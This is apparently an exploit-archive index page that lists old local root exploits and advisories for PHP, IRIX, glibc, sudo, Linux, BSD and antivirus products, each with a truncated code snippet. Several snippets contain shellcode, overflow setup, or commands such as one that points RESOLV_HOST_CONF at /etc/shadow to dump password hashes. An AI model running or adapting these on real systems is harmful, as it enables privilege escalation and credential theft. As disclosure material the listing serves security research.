PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / //...

PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

Exploit for linux platform in category local exploits ===================================================================== PHP = 4.4.6 / 5.2.1 arrayuserkeycompare ZVAL dtor Local Exploit ===================================================================== ?php...

KLA10122 SB vulnerability in Comodo Firewall Pro

An unspecified vulnerability was found in Comodo Firewall Pro. By exploiting this vulnerability malicious users can bypass the driver protection for registry keys. This vulnerability can be exploited locally at a point related to OLE NamedPipe. Original advisories - Related products...

McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit

Exploit for macOS platform in category local exploits ========================================================== McAfee VirusScan for Mac Virex \n\nTargets:\n\n"; foreach $key sortkeys %tgts $a,$b = split/:/,$tgts"$key"; print "\t$key . $a\n"; print "\n"; exit 1; $a,$b = split/:/,$tgts"$target";...

Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit

Exploit for plan9 platform in category local exploits ==================================================== Plan 9 Kernel devenv.c OTRUNC/pwrite Local Exploit ==================================================== / !!! DO NOT DISTRIBUTE !!! / / identity theft this exploit uses my devenv.c...

CVE-2007-0670

CVE-2007-0670 affects IBM AIX 5.2 and 5.3, where a buffer overflow in bos.rte.libc can be triggered by the r-commands (rdist, rsh, rcp, rsync, rlogin) to allow local users to execute arbitrary code. Root cause: insufficient bounds checking in bos.rte.libc. Impact: local code execution with partia...

Trend Micro VirusWall 3.81 - &#039;vscan/VSAPI&#039; Local Buffer Overflow

/ Title: Local root exploit for vscan/VSAPI =Trend Micro VirusWall 3.81 on Linux Author: Sebastian Wolfgarten / [email protected] / http://www.devtarget.org Date: January 3rd, 2007 Severity: Medium Description: The product "InterScan VirusWall 3.81 for Linux" ships a library called...

Microsoft Visual C++ - &#039;.RC Resource Files&#039; Local Buffer Overflow

// // // Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow // vulnerability .rc resource files exploit // // vulnerability found / exploit built by porkythepig // // include "stdio.h" include "stdlib.h" include "memory.h" define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit ...

PT-2006-6799 · Freebsd · Ld.So

Name of the Vulnerable Software and Affected Versions: ld.so in FreeBSD, NetBSD, and possibly other BSD distributions affected versions not specified Description: The issue allows local users to gain privileges by passing certain environment variables to loading processes, as ld.so does not remov...

Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit

Exploit for unknown platform in category local exploits =============================================================== Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit =============================================================== //////////////////////////////////// ///// AVP...

IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit

No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/lib/print/netprint This code gets released due to another post to the Bugtraq mailing list. For IRIX 6.3 and above this privilage escalation attack can be conducted by local lp users...

IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit

No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/bin/lpstat EXECUTABLE=/usr/bin/lpstat FILE=file LIBRARY=lsd DIRECTORY=tmp cd $DIRECTORY cat $FILE 'EOF' HOSTNAME=localhost HOSTPRINTER=bzzz-z EOF echo NETTYPE=../../../../$DIRECTORY/ls...

IRIX /bin/login Local Buffer Overflow Exploit

No description provided by source. / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include stdio.h...

xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)

No description provided by source. / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003 http://www.debian.org/security/2003/dsa-356 / include stdlib.h define RETADDR 0xbfffff11 define DEFAULTBUFFERSIZE 29 define DEFAULTEGGSIZE 512 define NOP 0x90 define BIN...

GLIBC 2.1.3 ld_preload Local Exploit

No description provided by source. !/bin/tcsh przyklad wykorzystania dziury w LDPRELOAD shadow tested on redhat 6.0, should work on others if -e /etc/initscript echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LDPRELOAD libSegFault.so setenv SEGFAULTOUTPUTNAME /etc/initscript echo...

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit

No description provided by source. / Linux kernel ptrace/kmod local root exploit This code exploits a race condition in kernel/kmod.c, which creates kernel thread in insecure manner. This bug allows to ptrace cloned process, allowing to take control over privileged modprobe binary. Should work...

Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)

No description provided by source. include stdio.h include stdlib.h include unistd.h include sysexits.h include sys/wait.h define SUDO "/usr/bin/sudo" ifdef BUFSIZ undef BUFSIZ define BUFSIZ 128 endif / ANY MODIFIED REPUBLISHING IS RESTRICTED OpenBSD sudo 1.3.1 - 1.6.8p local root exploit Tested...

Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit

No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...

MS Windows Improper Token Validation Local Exploit (working)

No description provided by source. / Removed include "stdafx.h" / str0ke / include stdio.h include windows.h define INFOBUFFERSIZE MAXCOMPUTERNAMELENGTH + 1 define PATHSIZE INFOBUFFERSIZE + MAXPATH + 4 typedef UINT WINAPI PFnMsiInstallProductLPCSTR szPackagePath, LPCSTR szCommandLine; int mainint...